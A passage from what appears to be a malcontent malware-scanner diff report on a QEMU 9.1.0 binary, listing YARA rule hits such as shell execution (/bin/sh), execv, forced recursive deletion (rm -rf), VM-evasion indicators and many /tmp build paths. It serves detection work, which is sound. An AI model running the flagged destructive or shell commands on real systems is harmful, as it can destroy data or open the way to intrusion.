[visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code) | +| MEDIUM | [evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code)
[QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code)
[qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execv](https://github.com/search?q=execv&type=code) | | MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) | | MEDIUM | [exec/tty/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/open.yara#openpty) | finds and opens an available pseudoterminal | [openpty](https://github.com/search?q=openpty&type=code) | | MEDIUM | [fs/attributes/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/remove.yara#remove_xattr) | [remove an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/removexattr.2.html) | [removexattr](https://github.com/search?q=removexattr&type=code) | | MEDIUM | [fs/attributes/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/set.yara#set_xattr) | [set an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/setxattr.2.html) | [setxattr](https://github.com/search?q=setxattr&type=code) | | MEDIUM | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_recursive_force) | Forcibly deletes files recursively | [rm -rf](https://github.com/search?q=rm+-rf&type=code) | -| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch event kind](https://github.com/search?q=touch+event+kind&type=code)
[touch event type](https://github.com/search?q=touch+event+type&type=code)
[touch slot number](https://github.com/search?q=touch+slot+number&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/perf-%d.map](https://github.com/search?q=%2Ftmp%2Fperf-%25d.map&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/block/block-gen.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fblock%2Fblock-gen.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/hw/usb/hcd-ehci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fhw%2Fusb%2Fhcd-ehci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/base.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Fbase.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/list.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Flist.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/listfile.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Flistfile.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/simple.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Fsimple.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/block/throttle-gro](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fblock%2Fthrottle-gro&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char-fd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar-fd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char-socke](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar-socke&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret_comm](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret_comm&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret_keyr](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret_keyr&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tls-cipher-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftls-cipher-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscreds.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscreds.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredsano](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredsano&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredspsk](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredspsk&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredsx50](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredsx50&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/memory.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fmemory.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/memory_ldst_c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fmemory_ldst_c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/ram_addr.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fram_addr.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/acpi_aml_i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Facpi_aml_i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/acpi_dev_i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Facpi_dev_i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/vmgenid.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Fvmgenid.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/block/flash.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fblock%2Fflash.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/boards.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fboards.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/char/serial.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fchar%2Fserial.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/clock.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fclock.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/cpu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fcpu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/generic-lo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fgeneric-lo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/resetconta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fresetconta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/cpu/cluster.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcpu%2Fcluster.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/cpu/core.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcpu%2Fcore.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/display/i2c-ddc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fdisplay%2Fi2c-ddc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/elf_ops.h.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Felf_ops.h.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/fw-path-provide](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Ffw-path-provide&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/hotplug.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fhotplug.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/i2c/i2c.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fi2c%2Fi2c.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-pci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-sysbus](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-sysbus&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-bus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-bus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-dev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-dev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/intc/intc.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fintc%2Fintc.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ipack/ipack.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fipack%2Fipack.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/misc/vmcoreinfo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fmisc%2Fvmcoreinfo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nmi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnmi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nvram/fw_cfg.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnvram%2Ffw_cfg.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci-host/gpex.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci-host%2Fgpex.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_bridge.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_bridge.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_device.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_device.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_port.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_port.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/qdev-core.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fqdev-core.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/resettable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fresettable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/esp.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fesp.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/scsi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fscsi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sdhci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsdhci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sysbus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsysbus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/imx-usb-phy](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fimx-usb-phy&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/msd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fmsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-commo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-commo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-conta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-conta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vdpa-dev](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvdpa-dev&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-sc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-sc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-us](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-us&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-vs](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-vs&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-b](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-b&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-g](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-g&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-n](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-n&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-p](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-p&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-r](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-r&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-s](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-s&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vmstate-if.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvmstate-if.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-buffer.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-buffer.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-command](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-command&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-file.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-file.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-null.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-null.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-socket.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-socket.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-tls.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-tls.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-websock](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-websock&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/dns-resolver.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fdns-resolver.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/net-listener.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fnet-listener.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/can_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Fcan_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/filter.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Ffilter.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qapi/qmp/qobject.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqapi%2Fqmp%2Fqobject.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bitops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbitops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bswap.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbswap.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/coroutine.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fcoroutine.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/int128.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fint128.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/iov.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fiov.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/lockable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Flockable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/main-loop.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fmain-loop.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/range.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frange.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/ratelimit.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fratelimit.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/rcu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frcu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/thread-contex](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fthread-contex&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qom/object_interfa](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqom%2Fobject_interfa&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/scsi/pr-manager.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fscsi%2Fpr-manager.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/accel-ops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Faccel-ops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/cryptodev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fcryptodev.h&type=code)
